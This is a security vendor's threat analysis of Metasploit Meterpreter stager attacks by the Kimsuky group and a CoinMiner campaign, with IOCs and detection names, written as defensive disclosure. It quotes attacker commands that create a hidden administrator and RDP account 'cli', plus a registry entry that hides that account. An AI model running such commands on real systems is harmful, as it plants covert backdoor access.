Attack Cases Using Metasploit Meterpreter

Metasploit is a framework used in penetration testing. It is a tool that can be used to inspect security vulnerabilities for networks and systems of companies and organizations, providing various features for each penetration test stage. Like Cobalt Strike, it provides features necessary for each stage, from creating various types of payloads for the initial infection and stealing account information to dominating the system via lateral movement.

While Cobalt Strike is commercial software, its crack version is leaked and used often by attackers. Metasploit on the other hand is an open-source program that is open to the public and can be easily exploited. This post will discuss actual cases where Metasploit Meterpreter was used for the attack.

Figure 1. Metasploit GitHub

Metasploit Meterpreter

Cobalt Strike provides Beacon which is the actual malware that operates as a backdoor in the infected PC. Depending on the method of installing a Beacon, it can be classified as Staged or Stageless. When Cobalt Strike is built with the Staged method, a powershell or small shellcode that has a downloader feature is created. The attacker can distribute such small-sized stager through various means. When the stager is executed in the infected PC, it downloads Beacon that is the main malware on the memory, and runs it. The Stageless method creates a binary included with Beacon instead. As such, the binary can directly communicate with the C&C server without having to download Beacon.

Metasploit also provides a backdoor that performs actual malicious behaviors like Beacon from Cobalt Strike, called Meterpreter. Like Beacon, it can be created in both Staged and Stageless methods. This means that both Cobalt Strike and Metasploit can be used as penetration test tools to control the infected PC and steal information.

The following 2 cases all use the stager method. Instead of including Meterpreter in the distributed file, a shellcode is included to download a backdoor containing Meterpreter. Note that the shellcode shown below is the one included in the powershell form stager used in the second example, downloading Meterpreter by accessing the 122.165.141[.]2:8888 URL.

To be more precise, the downloaded file is metsrv.dll, the basic backdoor of Meterpreter. The file is created to be executed with the Reflective DLL injection method as shown below. One characteristic of the method is that the start address (the part starting with MZ) can operate as a code. So the code that newly loads the DLL file itself into the memory through MZ is executed. When the loading is complete (in order words, when the Reflective DLL injection method is finished), the file hands over the control to run the actual code of metsrv.dll. Note that Meterpreter is modularized depending on its features. Besides the default metsrv.dll, it supports various extension DLLs for privilege escalation or additional tasks.

Figure 2. Meterpreter using Reflective DLL injection method

Kimsuky Group

The Kimsuky group also uses Metasploit Meterpreter. While monitoring Metasploit malware, the ASEC analysis team confirmed that Meterpreter can operate in the rundll32.exe process. The actual malware is the 64 bit DLL, which is loaded by the regsvr32.exe process and then executed. Afterward, Meterpreter operates in the normal program rundll32.exe by executing rundll32.exe and injecting the stager shellcode.

The injected shellcode downloads Meterpreter on the memory from the 79.133.41[.]237:4001 URL and runs it. The following is the Meterpreter DLL downloaded from the Metasploit C&C server, which is similar to the binary found in the memory area mentioned above.

Figure 3. Meterpreter DLL being downloaded

The downloaded binary is the same as the source code of the open-source Meterpreter.

Figure 4. server_setup() function that is the initial routine of downloaded metsrv.dll

AhnLab’s cloud-based ASD (Ahnlab Smart Defense) infrastructure can collect and analyze various types of malware in real-time. By only extracting malicious DNA from malware, it can create patterns to be used for diagnosis. According to current DNA patterns existing in ASD, there have been multiple files similar to the malware.

Just looking at files made public among those with similar forms shows that their C&C server URLs are all IP addresses related to the Kimsuky group. It is currently impossible to download Meterpreter for previous samples. Yet besides the external characteristics (for example, having the 64 bit DLL form), they are all nearly identical to each other, such as being executed in regsvr32.exe to run the normal program rundll32.exe and inject the Metasploit stager. All of them use the x64 Reverse TCP Stager method of Meterpreter as well.

[Additional File 1]
– MD5: 7f4624a8eb740653e2242993ee9e0997
– C&C: 27.102.127[.]240:3001
– Collected Date: March 18th, 2021
[Additional File 2]
– MD5: d4da4660836d61db95dd91936e7cfa4a
– C&C: 27.102.127[.]240:3001
– Collected Date: May 22nd, 2021
[Additional File 3]
– MD5: d5ad5ffde477e3bc154a17b4d74f401b
– C&C: 31.172.80[.]104:3001
– Collected Date: May 21st, 2021

The following shows the routine for injecting the stager shellcode to rundll32.exe. Note that the decoding method is identical to that of AppleSeed, which is another backdoor malware recently used by the Kimsuky group.

Figure 5. Decoding routine same as that of AppleSeed, another backdoor malware of Kimsuky

The Kimsuky group has been using various types of backdoor malware. Recently, it was found that the group is using the Meterpreter backdoor of the open-source Metasploit framework. The attacker can exploit various features of Metasploit provided for each penetration stage to steal user information and send malicious commands.

Meterpreter Installed with CoinMiner

There have also been cases of Meterpreter being distributed with CoinMiner. While the team could not find any information about how the attacker approached the system and sent commands (initial attack path), it could check behaviors after certain stages through many files found in the download path.

Figure 6. Infection flow

1) Installing Miner
Among batch files that can be downloaded, brgolbat2.bat, golbat.bat, and golbat2.bat are all similar. The golbat.bat file that has the most items will become a target for analysis. The file downloads and installs multiple files using powershell.

After downloading defender.reg and registering the C:\Windows\System32\ path as an exception path, it installs the XMRig miner. Besides XMRig, other files are also installed, such as the settings file config.json that includes the mining pool URL and driver file WinRing0x64.sys which is a supplementary tool for enhancing XMRig performance. XMRig miner is then registered in the task scheduler to be periodically executed.

Figure 7. config.json file

2) Installing Meterpreter
While the initial distribution method was not discovered, it appears that the attacker executed the batty.bat file along with the CoinMiner installer mentioned above. The file mainly has the following features: making an exception for Windows Defender, scanning the basic information of the current system, registering an RDP user for later accesses, and installing Metasploit Meterpreter (backdoor).

It first registers an account named ‘cli’ using the following commands and registers it to a group for administrators and RDP access.

> net user cli 83ys44b /add
> net localgroup administrators cli /add
> net localgroup "Remote Desktop Users" cli /add

It then registers the account to the SpecialAccounts registry key using the downloaded user.reg. If the account is registered to the SpecialAccounts key as shown below, it will not be displayed when logging in, meaning that the user cannot figure out even if the account is added.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"cli"=dword:00000000

Among additional bat files that are downloaded and executed, there is avscan.bat. This file outputs various types of information ranging from the information of anti-malware products installed in the infected system to the computer name, graphic card name, MAC and public IP address, etc.

Lastly, batty.bat registers rdpclip.bat in the task scheduler as “Remote Desktop Clipboard” and runs the file. Using the NetStat command, rdpclip.bat terminates the notepad.exe process if there is currently no process using the 8888 port and executes rdpclip-run.bat. The process is done because Metasploit Meterpreter that will be installed later uses that port.

The role of rdpclip-run.bat is to simply run rdpclip.ps1 existing in the same path using powershell. rdpclip.ps1 is a Metasploit stager powershell script. Inside the powershell is the x64 shellcode. If the powershell is executed, the shellcode is also executed inside the memory. The executed shellcode downloads and runs the Meterpreter binary, which allows Meterpreter to be run through the stager inside the powershell process.

Figure 8. Metasploit stager powershell

The attacker created payloads with the x64 Staged Reverse TCP method and assigned files to powershells instead of exes. The attacker also assigned notepad.exe (notepad) with the PrependMigrateProc option. The option creates a normal process and injects Meterpreter in that process upon being executed, which is used to disguise the process with Meterpreter as a normal one. For instance, if the rdpclip.ps1 powershell discussed earlier is executed, it injects Meterpreter to notepad.exe and makes it start operating. So in the infection environment, notepad.exe operates instead of powershells or suspicious processes to perform backdoor activities.

Conclusion

The number of attacks targeting individuals and companies has risen recently. Also, penetration testing tools are often used during the process of dominating companies’ internal networks after the initial compromise. For tools, those that provide various features and can be easily obtained such as Cobalt Strike or Metasploit are selected. The attackers are exploiting such programs to attack normal users as well as ultimately dominate companies’ systems to leak confidential information or install CoinMiner and ransomware to inflict financial damage.

AhnLab products possess process memory-based detection technologies for Meterpreter backdoor that can perform malicious behaviors by receiving commands from the attacker from the first initial compromise stage exploiting Metasploit. Users should apply the latest patch for OS and programs such as Internet browsers, and update products including V3 to the latest version to prevent malware infection in advance.

[File Detection]

Trojan/Win.Agent.C4408533 (2021.04.09.03)
Trojan/Win.Agent.R422617 (2021.05.26.04)
Trojan/Win.Agent.R436488 (2021.08.12.00)
Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
Downloader/BAT.Generic (2021.08.31.03)
Downloader/PowerShell.Generic (2021.08.31.03)

[IOC Info]

Kimsuky Meterpreter
– MD5
d5ad5ffde477e3bc154a17b4d74f401b
7f4624a8eb740653e2242993ee9e0997
37e7d679cd4aa788ec63f27cb02962ea
d4da4660836d61db95dd91936e7cfa4a
– C&C
79.133.41[.]237:4001
27.102.127[.]240:3001
31.172.80[.]104:3001

CoinMiner & Meterpreter
– MD5
a3ee27e8e77e13e1255efb7d96f2aa21
36e6565271170a1570cae1b9d2cbbc1e
a0d491fbdda9cda115d52d723bd83cea
86ab6de61284a27bc6fbe4fb6bccda38
– Download URL
hxxp://88.202.190[.]25
– XMRig Mining Pool
88.202.190[.]25:4567
– Meterpreter C&C
122.165.141[.]2:8888

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments